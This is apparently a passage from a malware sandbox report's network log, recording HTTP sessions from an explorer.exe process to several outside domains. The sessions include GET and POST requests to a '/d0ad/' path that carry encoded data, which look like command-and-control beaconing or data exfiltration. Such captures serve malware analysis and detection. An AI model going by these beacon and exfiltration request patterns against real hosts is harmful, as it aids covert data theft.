y7Qy4zULdlsgrhv2s9hLPVSFbU3J-AUqgr3L3vJXD8Q~KsN2fX5ryzQyAm36GCKBRkeifP9UPydyAljIiSVHTZywCv9n-Xi9TWiuVG46im4NiGj8CTaV_XrDnkY0G6BjOM73iLq6H~wsnrZasOYvuG1sB3vm1Q9l-UlTiOnVvW85CJkK24hV0JKNZQhUgIvUSElj_XhuqKwL0ZgabMpGNBaaYfDMvb6(Qwid2VFDSdFtatSHHY1MjniyGdMSM(JVYyQJJIWb_2eubrKp51Z7qFw4voVf0h7J-g-van4hkRXt_2n~C1dx9Ma9kdbnQgtS6EPb2NXmHPb7N8qzeo0S3J8rlDFHFu26RMi4RGDN6b_bnPgpm8XS5Ybto9NLr6oR2r-Znhkim9eMVNaf2sJ04YDETLP(wPmijd_zojY3rjYNkULYVf3NwFKgo~em_7Dnt3nXHZrMmJMBncTc6rSNany46O0Ts9LhmUETkfoN_Om9bFemeTZVpw3smFgEm(2d12pYPDsyalk1JruKcOejvBm2QU8ieqA5-wWe9LxJJlp~0IM0G775W91W-ENsNubBu6Uk7NJafMlXMWaLkZHUbL3bOqLwEpxKr5LGEzRdaiZK-WtCWYccSSgd3u6FznTuhi0Hm9BAnuHT-aSh7(czN~IKOp9q5aJsB3UUVZKcY5NVJh4dj77yjHV7MKz02NZITt3xbc0ZtlysHVZGvMzM61x8Ecd(AJGHuilrGXMcr0aLWuKZ0YPs49W7V(lUQhpcEYdYn4jxn(HrXnQsiEoSTzGpKcQ(JJkiZdPigTCg9SpFwxwI5kMnOl1uUkSE6VHF0So0PYK73zRsI9eM5xiwGI6MDmHuIQKf3U5o03-lYrBMcwDe_4GMA4u7ypBiddbgaNZrZIFcHsPpiuKhcV3IOIzqEfcSBw_jKvonBCtIuBrqMbfH06rBJcHoBuKs3JeeXvnqA1a26E3~XtBoqqV9vzGDjsv3kzU(75eBqDXrZdz74dOwyJANskgvfIjNSrofSyaaR6kLAXhRrpqTD72cdwBv8HrbqekDFIZak(LMXzh9iOH2i39KHbN2b3fOWkPeco1gfkgSHBizMnlkXixOVJkmf9IA8E6X5X_inUrNnAyDJl9dN7FYtrAZxfk6pdval1m~2va5x2klJD-5bZ4nJlpn2xAThkDpx1aJ8chTCl2mxkW5xpCllF0m10APlNhrLiz5Z6ZEfDn4OTucEpbAk0tNG7V~IkTvQ7n85PRRfBO4SQ7H0BDHdupgQ3PaAL68qmWp_1HBIir79fnESaRCk
Oct 26, 2022 13:18:05.950758934 CEST	1150	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:18:05 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 26, 2022 13:18:05.950762033 CEST	1153	OUT	Data Raw: 63 65 32 63 5a 4f 73 41 4e 42 51 72 71 46 37 4e 39 6b 62 45 43 32 63 51 44 77 37 68 6a 66 30 54 36 2d 61 38 4a 4d 67 4d 35 51 74 43 35 76 65 49 72 67 57 4a 7e 42 71 71 56 50 72 68 58 59 4e 35 76 79 38 56 48 51 6d 51 48 36 64 6f 42 56 59 37 59 59 Data Ascii: ce2cZOsANBQrqF7N9kbEC2cQDw7hjf0T6-a8JMgM5QtC5veIrgWJ~BqqVPrhXYN5vy8VHQmQH6doBVY7YYcqpMAPfbC1rDVIcbRll0VHNKc8RCPNQV3UlJfGYoyWL52NW5EqxcDl7_zZHZcwJg1w3ZtioWMN7gSsjU6DI88hfjIMHJn8dJvSNlT_zTMWlPD7VGnQt-cDrU8oN-vY9R~NCTgx9rAjrKj10xFyoZztLsNdyl5HlDt
Oct 26, 2022 13:18:05.950885057 CEST	1162	OUT	Data Raw: 46 51 76 62 7a 68 69 58 61 4a 45 35 7a 6a 48 48 31 39 38 4e 78 42 70 59 45 31 73 51 6e 42 45 5a 6d 54 56 73 33 6a 6c 5a 58 2d 55 7a 4a 2d 6f 67 28 4d 4c 6c 58 6d 38 78 69 31 37 73 4c 2d 46 54 4f 64 70 51 79 74 6e 61 76 71 78 39 75 58 7e 6b 6d 64 Data Ascii: FQvbzhiXaJE5zjHH198NxBpYE1sQnBEZmTVs3jlZX-UzJ-og(MLlXm8xi17sL-FTOdpQytnavqx9uX~kmdLE2LrvzjFYqR35(SA8Yi8CIzIMZgJeIoskyufW1ZaYP5u5imxp9GOApoe_~MCEi12AAPmYS0Zyv232h3FIF7A0KJxcR6ddgxAYq8TbQtrSAcVFgerIiMmg19HzkLt0ne1v3B879fFT1SJSjK6z~FelYxesg5iYDof
Oct 26, 2022 13:18:05.951107025 CEST	1173	OUT	Data Raw: 63 54 35 39 6f 4c 38 6c 7a 50 6b 7a 65 55 37 30 43 69 41 67 50 42 6f 44 55 4f 61 4a 54 55 53 34 45 75 43 4e 6b 58 56 4a 62 38 61 57 69 7a 49 48 6c 57 56 4f 53 37 76 50 48 65 78 39 46 46 4f 52 7e 52 67 35 67 64 64 36 56 31 7a 38 47 45 6d 71 41 39 Data Ascii: cT59oL8lzPkzeU70CiAgPBoDUOaJTUS4EuCNkXVJb8aWizIHlWVOS7vPHex9FFOR~Rg5gdd6V1z8GEmqA9ggTXD9Vf(hgx~GfYIyoDNH~UjSphCqlIiYrlDJuEbu2iuDbFSnmN~iE8uOVpkUtz9lg6pzPqzhAWM64mWAO3SNAbcf0mhi7ntXkJd9snUJ7t~3wSEhU_7n7gLPiLw8mSU0gSah4lHeu3p0qTVe8rwKladcKmvoGyA
Oct 26, 2022 13:18:05.951215029 CEST	1176	OUT	Data Raw: 4a 52 78 58 51 79 43 31 46 7a 49 4c 4c 47 69 79 6b 45 55 6e 4b 61 75 63 53 62 70 50 35 43 38 5a 52 58 7a 71 54 79 37 4e 66 58 72 43 77 71 49 6d 69 57 51 75 41 75 76 37 4f 64 6b 69 53 51 47 38 70 37 68 41 34 71 71 6d 6d 54 35 50 39 2d 44 41 6e 63 Data Ascii: JRxXQyC1FzILLGiykEUnKaucSbpP5C8ZRXzqTy7NfXrCwqImiWQuAuv7OdkiSQG8p7hA4qqmmT5P9-DAncETDp4xiQgpVbewbSCvm3J1oF8eRxZdV-2lliVlAlAizKoxcVRU4th3hnwpfkBBQcEjfsr6A3f7Xo5tecvIAdP0oyhdCuYNYx3h~Px4xX(JYOvBDxjwXoB3jO3UGJYaBnVZ~nMldrmbCbxyopSu6adPWNtP83Z473y
Oct 26, 2022 13:18:06.132841110 CEST	1178	OUT	Data Raw: 71 41 68 43 59 34 50 45 61 4a 39 68 47 52 4b 53 63 53 75 4c 47 4e 71 65 4e 68 63 33 6b 37 70 38 64 61 7a 5f 42 73 4c 33 52 4a 41 72 63 78 71 46 41 6a 4e 30 75 34 4c 47 43 2d 49 71 74 4e 28 75 49 56 69 79 6f 36 33 34 67 71 6e 4c 66 73 66 65 53 30 Data Ascii: qAhCY4PEaJ9hGRKScSuLGNqeNhc3k7p8daz_BsL3RJArcxqFAjN0u4LGC-IqtN(uIViyo634gqnLfsfeS0zFtMIUVZ973D9luAnrI_LnLxfxjrJnnsVb~xwWAHGgSaWpzlQl85ehT_Fk4duXa7VgOqzgfB0zigl53jsCYCRkN1xpoKYWUeMpTUc69INgK3F8R07TnQRTYc8xYW~z8LckK5j4l4139l316G7PboJ3YVW8BKD1iof
Oct 26, 2022 13:18:06.132958889 CEST	1189	OUT	Data Raw: 73 4d 6f 70 37 37 74 52 31 46 73 30 4a 79 53 4b 75 67 7a 7a 49 5a 38 56 4b 44 63 35 61 44 45 73 65 30 4b 6a 37 72 37 54 41 55 30 42 78 36 64 63 41 55 34 74 50 68 37 73 30 5a 36 47 52 5f 47 30 64 6f 59 59 6f 4b 70 53 7e 45 4b 43 58 53 63 4c 62 79 Data Ascii: sMop77tR1Fs0JySKugzzIZ8VKDc5aDEse0Kj7r7TAU0Bx6dcAU4tPh7s0Z6GR_G0doYYoKpS~EKCXScLbyfJ~BYMgnCflXo6Nh3EfqR8PoGDodoaUahyuaac4YpaY7RmDlAz4GCbugnL9wufsLkCgerkVzfbrMTatuPt8xqVG-z6AIKQcv5ui6SUSTM6uykd1EYrGJdKlP9l(4gLq7(jijL55NLo2YN0Jzv2ImOl9SkBnEEOdto

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.11.20	49893	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:07.967758894 CEST	1190	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1 Host: www.driftreiki.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:18:08.147358894 CEST	1191	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:18:07 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49849	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:44.501684904 CEST	386	OUT	GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:15:44.527436018 CEST	386	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:15:44 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.11.20	49894	216.40.34.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:13.484931946 CEST	1192	OUT	POST /d0ad/ HTTP/1.1 Host: www.motorizedchess.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.motorizedchess.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.motorizedchess.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 38 67 66 48 63 41 37 69 68 5a 53 55 51 51 28 49 49 6b 32 43 28 35 70 57 51 61 41 39 58 4d 67 5a 77 4e 4e 74 50 6c 57 56 33 74 53 68 50 46 59 41 61 32 77 39 39 57 65 6a 61 49 41 79 31 35 46 57 33 41 66 74 73 4a 63 49 49 4d 79 35 68 37 45 62 44 76 78 77 31 33 62 34 35 36 4c 5a 4a 38 7a 39 6f 38 45 37 74 4c 58 4f 36 2d 33 49 7a 73 61 73 6e 52 35 64 7e 56 7e 61 45 53 73 42 58 53 6e 35 76 65 75 54 53 5f 68 61 7a 39 71 4a 52 41 58 50 70 58 6c 72 72 4f 38 7a 56 42 63 57 61 79 69 30 56 72 42 30 43 56 73 74 6a 73 34 70 57 46 30 33 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=8gfHcA7ihZSUQQ(IIk2C(5pWQaA9XMgZwNNtPlWV3tShPFYAa2w99WejaIAy15FW3AftsJcIIMy5h7EbDvxw13b456LZJ8z9o8E7tLXO6-3IzsasnR5d~V~aESsBXSn5veuTS_haz9qJRAXPpXlrrO8zVBcWayi0VrB0CVstjs4pWF03zQ).
Oct 26, 2022 13:18:13.638712883 CEST	1193	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Wed, 26 Oct 2022 11:18:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Request-Id: 78498ab2-d32c-40b1-98c4-9a9cfa35ea0f X-Runtime: 0.049173 Content-Encoding: gzip Data Raw: 31 33 34 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 53 db c6 bb 7f 9f 4f b1 35 73 62 93 60 f9 42 08 c1 b1 dd 71 8d 49 e8 21 90 02 b9 b4 99 8c 2b ac 35 56 11 92 2b c9 5c d2 93 ff 67 3f bf e7 d9 5d 69 65 63 42 a0 e7 c5 99 49 98 26 42 da 7d ee b7 dd 7d b6 ed 9f b6 0f fa c7 bf bf 1d 88 49 7a 1e 74 1f b5 e9 1f 11 b8 e1 69 a7 24 c3 12 bd 90 ae d7 7d 24 44 fb 5c a6 ae 18 4d dc 38 91 69 a7 34 4b c7 d5 17 25 51 e3 4f a9 9f 06 b2 db 1b a5 7e 14 8a 7e 14 a6 71 14 04 32 6e 89 c1 d5 48 4e f9 ed c8 9d 9d 4e d2 76 4d 0d a5 49 49 7a 8d 49 78 12 e2 24 f2 ae c5 3f fc 88 5f dc d1 d9 69 1c cd 42 af 3a 8a 82 08 50 56 76 7a f4 f3 52 0f 30 6f d7 d7 d7 cd ab 73 37 3e f5 c3 96 a8 4f af d4 ab af 8f 32 c0 6b 62 ba 26 a2 60 4d cc f0 5f ea 65 78 c6 a0 b3 3a 76 cf fd e0 ba 25 26 32 b8 90 a9 3f 72 d7 c4 85 8c 3d 37 c4 83 1b fb 2e a6 24 6e 98 54 13 19 fb 63 83 8d 67 26 fe 17 d9 02 b9 8d 75 83 53 88 c0 0f 65 75 22 7d 70 da 12 8d 17 73 c4 4c 63 59 44 ae 40 34 1a 39 80 cb 89 9f ca 6a 32 75 47 80 8d f1 d5 cb d8 9d 16 38 c2 4b e7 24 ba ca a5 15 c5 1e 49 1a 40 44 12 05 be 27 56 06 83 81 a1 74 ea 7a 9e 1f 9e e2 73 26 19 21 16 84 25 c4 a5 ef a5 93 96 d8 da 98 a7 99 b4 2f e3 0c 5b a6 90 fa 0e 7e 0c 96 5c 63 d0 55 7f a3 b9 d3 7c b6 40 40 dd d9 90 e7 a2 41 7f 17 f8 99 34 32 e0 19 5d 4e 13 43 33 e8 45 a1 3a 0d 03 40 08 4b 0f 98 51 04 db 5c a0 b9 48 58 01 6a 73 63 4e 55 8e 07 63 f7 83 e4 36 31 6f d7 e9 27 93 01 eb a1 1a bb 9e 3f 4b 5a e2 59 ae 53 c3 16 08 cf ed 53 08 cf 4f a6 81 0b d3 3b 09 a2 d1 99 01 63 14 b1 39 af 08 27 99 9d 03 52 ee 26 99 6a 31 52 34 32 06 c8 99 98 92 93 28 4d a3 f3 82 61 14 29 be 89 00 ed 36 19 fb b6 c9 1a 3e 16 50 b5 44 18 85 b2 20 fe 95 11 5c c4 85 37 e4 a6 03 a3 25 9f 61 6b cc 48 d4 de 9a 19 60 a3 5e ff af 45 d3 b9 c1 6c 9c 24 9a c5 23 29 9e 2c 5a 4f 2e f9 4c 44 f3 61 c1 cc fe c7 84 9c 45 27 da de a2 9f 4c bb 59 4c 82 85 0f fa f4 73 07 8d 29 12 6d 19 16 fc d1 b6 06 25 91 1b 24 69 48 75 3c 17 e1 d7 10 6c 59 fe 8b 5c 62 11 42 d7 38 88 2e 5b c2 9d a5 d1 22 ed 79 3c dd d9 29 a8 cb f1 c3 71 94 01 cf c5 b6 e0 ad 45 6a 1c 72 a2 61 38 3b 3f 91 b1 e5 2a 8b f1 bb 28 31 13 44 7a bd 2c a4 e7 72 81 93 e4 58 33 63 8e 75 48 cd 83 dc f6 f6 b6 61 30 95 57 69 d5 0d fc 53 24 00 1e 58 e4 8d 88 9c e7 ad 1a c8 31 85 68 2b 2a ce 87 de 45 20 ad 09 09 38 0f 09 8b 7c ee 3c a7 9f c5 99 8e 8b d4 78 91 53 71 53 8a db e9 e3 4f 71 ea c4 f7 3c 19 66 08 33 87 5d 70 37 18 86 30 52 dd 7a 51 df aa 6f bc 14 5f d9 b6 dd d6 85 9f 20 a7 20 ed 65 23 9e 3f 7f 9e 7d 76 d2 18 b9 a6 3a 8e dd 73 09 15 de 38 c6 f0 9d 7d d4 91 d4 a0 28 c0 70 12 19 c8 51 11 a1 1a 8f e1 da dd 56 90 dd 53 39 4c dd 93 c0 c8 24 8b fd 4a 02 3a 40 80 a7 c0 9d 26 c8 85 e6 89 3e 33 9c 02 8c 94 d2 94 48 8d 6e e6 22 60 33 b7 1a cf f3 6e 87 80 dc 4a 61 53 cb 7c 0e 90 91 fb 72 02 cc f4 74 a2 21 cc 39 bc e2 ae 98 d1 74 3c bd 13 50 3f 9c ce d2 95 44 ba f1 c8 60 a8 5e ca 93 33 1f 0e 30 9d e2 b5 1b 52 e5 40 1e 31 f6 65 b0 8c 59 ae b7 96 89 cb aa 24 96 8b 4b 43 68 85 e9 a4 3a 9a f8 81 57 89 3c 6f d5 88 cd 8e 96 e3 26 fd 2c 91 3a 81 71 e4 15 dc 63 78 ee a6 Data Ascii: 1347\kSO5sb`BqI!+5V+\g?]iecBI&B}}Izti$}$D\M8i4K%QO~~q2nHNNvMIIzIx$?_iB:PVvzR0os7>O2kb&`M_ex:v%&2?r=7.$nTcg&uSeu"}psLcYD@49j2uG8K$I@D'Vtzs&!%/[~\cU\|@@A42]NC3E:@KQ\HXjscNUc61o'?KZYSSO;c9'R&j1R42(Ma)6>PD \7%akH`^El$#),ZO.LDaE'LYLs)m%$iHu<lY\bB8.["y<)qEjra8;?(1Dz,rX3cuHa0WiS$X1h+E 8\|<xSqSOq<f3]p70RzQo_ e#?}v:s8}(pQVS9L$J:@&>3Hn"`3nJaS\|rt!9t<P?D`^30R@1eY$KCh:W<o&,:qcx
Oct 26, 2022 13:18:13.638783932 CEST	1194	IN	Data Raw: a3 89 4c d6 16 74 cb 63 c6 b3 2f 5f ae cd 98 05 34 26 b0 ed 91 f7 bf 8a 02 78 cd 61 e4 fd 2e 03 04 c3 82 41 99 a4 a8 2a 25 32 8c a3 c0 4d e5 ab 58 5e df 99 42 08 ee 4e 44 e6 f2 b5 c4 91 bb ee dd 6d cb 94 ac 99 2d a1 b8 10 eb 3a 74 29 b3 99 ba e9 Data Ascii: Ltc/_4&xa.A%2MX^BNDm-:t)dX0]Hd~8A5QgkdTn,^Y},HFsL_w=0p!GG1L;L)EhWff,Y$YAIDH&iEB(G^<CW>8l`IW
Oct 26, 2022 13:18:13.638839960 CEST	1196	IN	Data Raw: 27 a9 44 47 53 82 be b3 58 60 eb 1b 27 01 b4 f7 a2 7a 27 78 3c 7d a8 10 1d 3e 8e dd ea 2f f1 4f db e6 cc 09 b0 30 4e 27 78 ff f4 69 7e bc 67 b1 fe c9 ff ec a0 63 6f 70 01 a2 f7 34 ba 4a 99 d1 97 d7 f2 13 58 99 4f 16 42 3a 38 70 a0 09 db 72 ec ce Data Ascii: 'DGSX`'z'x<}>/O0N'xi~gcop4JXOB:8prhHGsN!;B}F#x:e-RMvm;\|@8DHVJf@iMJY0`vnr),cbZcM~$lVtKe,YFWc/}JN'f-=J2
Oct 26, 2022 13:18:13.638892889 CEST	1197	IN	Data Raw: 2e 58 ad 5f 6e 48 26 a8 f8 dd 2a 65 0b 30 01 50 79 bd 3d 93 f3 dc 91 f2 c1 db 66 16 f3 a1 85 9a 53 dd 1d 00 14 53 a2 29 d8 a1 84 43 a5 04 d3 34 78 39 41 c7 7d 18 41 99 1c 07 2f dc 60 26 85 8f a8 05 5b 85 66 98 65 f5 8d d8 85 1d 9d 04 33 72 af ac Data Ascii: .X_nH&e0Py=fSS)C4x9A}A/`&[fe3r=ZaD(X8=hXnf6KPr!HA3Z2kIUFWQkY.Io%R=eH]OEB1"BK{97S"ME\|$
Oct 26, 2022 13:18:13.638932943 CEST	1197	IN	Data Raw: cd 2d a7 f1 6c dd 59 df d4 13 14 15 bd bd e1 51 ff 70 f7 ed f1 70 bf f7 26 e3 4d 0f 39 1c bc 39 38 1e 0c 7b db db 39 a8 e6 a6 53 c7 4f 43 0f 39 1a 1c 82 ae c2 e4 5b 39 d1 e3 df 1e 1e 1c 1f f4 73 31 69 66 34 d4 9b 4d f4 f6 70 a4 b6 2c ec 78 f4 9a Data Ascii: -lYQpp&M998{9SOC9[9s1if4Mp,x/}xB5[_E0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.11.20	49895	216.40.34.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:15.607259989 CEST	1199	OUT	POST /d0ad/ HTTP/1.1 Host: www.motorizedchess.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.motorizedchess.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.motorizedchess.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 38 67 66 48 63 41 37 69 68 5a 53 55 52 78 76 49 4f 44 43 43 36 5a 70 56 66 36 41 39 65 73 67 46 77 4e 42 74 50 6e 36 38 77 62 36 68 50 6c 6f 41 49 6b 59 39 36 57 65 6a 53 6f 42 34 71 70 46 64 33 41 43 61 73 4c 34 49 49 4d 4f 35 68 4e 49 62 49 5f 78 33 36 58 62 37 34 36 4c 61 65 4d 7a 42 6f 38 49 64 74 4a 72 4f 36 50 50 49 77 75 43 73 6a 46 56 65 36 31 7e 63 47 53 73 41 5a 43 6e 33 76 65 79 78 53 37 73 6e 79 4d 65 4a 57 67 33 50 71 58 6c 73 79 75 38 2d 4e 78 64 44 5a 78 79 35 62 4e 68 6d 58 32 38 49 6e 65 31 41 43 48 67 34 78 75 71 6a 7a 50 46 53 4f 66 6c 59 54 50 52 4a 59 5f 30 32 70 46 4a 64 48 77 41 71 64 52 70 46 30 68 75 61 55 43 28 43 57 65 77 4d 5a 54 75 5a 6f 45 6a 52 73 5a 78 68 56 4a 53 38 28 57 54 30 6b 37 71 42 61 76 48 4d 50 4f 6a 4e 53 53 67 4b 4e 32 49 6a 44 64 7e 52 43 69 5a 44 6b 34 69 75 6f 31 4b 5f 35 67 74 66 4b 67 47 63 76 44 33 74 4b 65 4a 62 4a 61 4c 36 39 53 49 66 59 69 49 6e 46 4a 76 4a 6e 58 6b 7a 48 41 59 64 57 49 49 76 31 45 59 59 61 70 59 44 49 64 68 78 72 4a 6e 53 75 52 6b 47 79 30 45 4b 28 37 34 6a 68 36 77 6d 75 6a 4a 70 63 75 67 55 63 78 48 6c 61 47 4a 43 35 33 61 6c 41 67 74 45 71 77 4f 33 61 55 6a 6b 50 44 42 70 69 6f 72 6e 42 52 67 65 75 5f 76 32 4e 67 44 5f 4b 74 68 66 69 36 6f 75 7a 47 62 55 65 65 52 6a 32 54 39 33 6f 35 61 63 49 57 65 46 47 37 66 4f 7e 4b 52 62 78 63 54 52 65 49 63 4e 7e 4d 66 58 69 39 35 7a 41 44 54 53 38 54 76 50 74 5a 33 5a 62 78 31 78 62 54 44 5f 6d 6b 65 71 37 66 75 65 42 50 39 42 48 78 62 42 6e 30 34 58 42 45 39 36 6c 69 58 48 51 52 4c 63 4c 5f 49 6f 69 6e 33 39 64 50 38 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=8gfHcA7ihZSURxvIODCC6ZpVf6A9esgFwNBtPn68wb6hPloAIkY96WejSoB4qpFd3ACasL4IIMO5hNIbI_x36Xb746LaeMzBo8IdtJrO6PPIwuCsjFVe61~cGSsAZCn3veyxS7snyMeJWg3PqXlsyu8-NxdDZxy5bNhmX28Ine1ACHg4xuqjzPFSOflYTPRJY_02pFJdHwAqdRpF0huaUC(CWewMZTuZoEjRsZxhVJS8(WT0k7qBavHMPOjNSSgKN2IjDd~RCiZDk4iuo1K_5gtfKgGcvD3tKeJbJaL69SIfYiInFJvJnXkzHAYdWIIv1EYYapYDIdhxrJnSuRkGy0EK(74jh6wmujJpcugUcxHlaGJC53alAgtEqwO3aUjkPDBpiornBRgeu_v2NgD_Kthfi6ouzGbUeeRj2T93o5acIWeFG7fO~KRbxcTReIcN~MfXi95zADTS8TvPtZ3Zbx1xbTD_mkeq7fueBP9BHxbBn04XBE96liXHQRLcL_Ioin39dP8.
Oct 26, 2022 13:18:15.766225100 CEST	1200	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Wed, 26 Oct 2022 11:18:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Request-Id: 97915c7d-ddd4-46c0-9014-b99ddccaf715 X-Runtime: 0.054586 Content-Encoding: gzip Data Raw: 31 34 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c e9 53 db c8 97 df f3 57 f4 cf d4 8e cd 0c 96 2f 30 e0 60 a6 8c 0f 30 01 9b b5 9d 83 a4 52 1e d9 6a db 02 59 52 74 f8 c8 ec cc df be ef f5 21 b5 6c 20 0c cc 7e d8 aa 84 9a 44 48 dd ef be ba fb f5 9c fc a7 d1 ad 0f 6e 6f 9a 64 16 cc ad d3 37 27 f8 0f b1 74 7b 5a 4d 51 3b 85 2f a8 6e 9c be 21 e4 64 4e 03 9d 8c 67 ba e7 d3 a0 9a 0a 83 49 f6 28 45 72 ec 53 60 06 16 3d ad 8d 03 d3 b1 49 dd b1 03 cf b1 2c ea 55 48 73 35 a6 2e 7b 3b d6 c3 e9 2c 38 c9 f1 a1 38 c9 0f d6 30 09 9e 08 19 39 c6 9a fc c9 1e e1 17 7d 7c 3f f5 9c d0 36 b2 63 c7 72 00 ca 4e ab 86 3f 6f c5 00 f9 b6 54 2a c9 57 73 dd 9b 9a 76 85 e4 dd 15 7f f5 d7 9b 08 f0 1e 71 f7 88 63 ed 91 10 fe 0b 8c 08 cf 04 e8 cc 4e f4 b9 69 ad 2b 64 46 ad 05 0d cc b1 be 47 16 d4 33 74 1b 1e 74 cf d4 61 8a af db 7e d6 a7 9e 39 91 d8 d8 4c df fc 4e 2b 40 6e a1 24 71 12 62 99 36 cd ce a8 09 9c 56 48 e1 68 83 18 d7 a3 49 e4 1c 44 a1 10 03 58 ce cc 80 66 7d 57 1f 03 6c 18 9f 5d 7a ba 9b e0 08 5e 6a 23 67 15 4b cb f1 0c 94 34 00 21 be 63 99 06 d9 69 36 9b 92 52 57 37 0c d3 9e c2 e7 48 32 84 6c 09 8b 90 a5 69 04 b3 0a 39 3e d8 a4 19 b5 4f bd 08 5b a4 90 7c 0b 7e 24 96 58 63 a0 ab fa 41 b1 55 dc df 22 20 af 1d d0 39 29 e0 df 09 7e 66 85 08 78 44 97 56 84 a1 11 f4 a4 50 b5 82 04 40 88 a2 07 98 91 04 5b dc a2 39 49 58 02 6a f1 60 43 55 9a 01 c6 6e 5a fe 53 62 6e e4 f1 27 92 01 d3 43 d6 d3 0d 33 f4 2b 64 3f d6 a9 64 0b 08 8f ed 93 10 c3 f4 5d 4b 07 d3 1b 59 ce f8 5e 82 91 8a 38 dc 54 84 e6 87 73 80 14 bb 49 a4 5a 18 49 0a 11 03 e8 4c 8c 92 91 13 04 ce 3c 61 18 49 8a 1f 22 40 b8 4d c4 be 6a b2 92 8f 2d 54 15 62 3b 36 4d 88 7f 67 0c 2e a2 83 37 c4 a6 03 46 8b 3e c3 ac 31 22 51 78 6b 64 80 85 7c fe bf b6 4d e7 01 b3 d1 7c 27 f4 c6 94 fc ba 6d 3d b1 e4 23 11 6d 86 05 39 fb 4f 19 72 b6 9d a8 71 8c 3f 91 76 a3 98 04 16 de ac e3 cf 33 34 c6 49 54 65 98 f0 47 d5 1a b8 44 1e 90 a4 24 55 33 74 08 bf 92 60 c5 f2 8f 62 89 39 10 ba 26 96 b3 ac 10 3d 0c 9c 6d da e3 78 da 6a 25 d4 a5 99 f6 c4 89 80 c7 62 db f2 d6 24 35 1a 3a d1 d0 0e e7 23 ea 29 ae b2 1d bf 93 12 93 41 a4 56 8b 42 7a 2c 17 70 92 18 6b 64 cc 9e 08 a9 71 90 6b 34 1a 92 c1 80 ae 82 ac 6e 99 53 48 00 6c 60 92 37 24 72 93 b7 ac 45 27 18 a2 95 a8 b8 19 7a b7 81 54 66 28 e0 38 24 6c f3 d9 2a e3 cf f6 4c 4d 87 d4 b8 88 a9 78 28 c5 b5 ea f0 27 39 75 66 1a 06 b5 23 84 91 c3 6e b9 1b 18 06 91 52 3d 3e ca 1f e7 0f de 92 bf 98 6d eb 95 85 e9 43 4e 81 b4 17 8d 28 97 cb d1 67 2d f0 20 d7 64 27 9e 3e a7 a0 c2 07 c7 48 be a3 8f 22 92 4a 14 09 18 9a 4f 2d 3a 4e 22 e4 e3 61 b8 70 b7 1d c8 ee 01 1d 06 fa c8 92 32 89 62 3f 97 80 08 10 c0 93 a5 bb 3e e4 42 f9 84 9f 19 9c 04 8c 00 d3 14 09 a4 6e 36 22 60 31 b6 1a c3 30 9e 86 00 b9 15 c3 a6 90 f9 06 20 29 f7 c7 09 90 d3 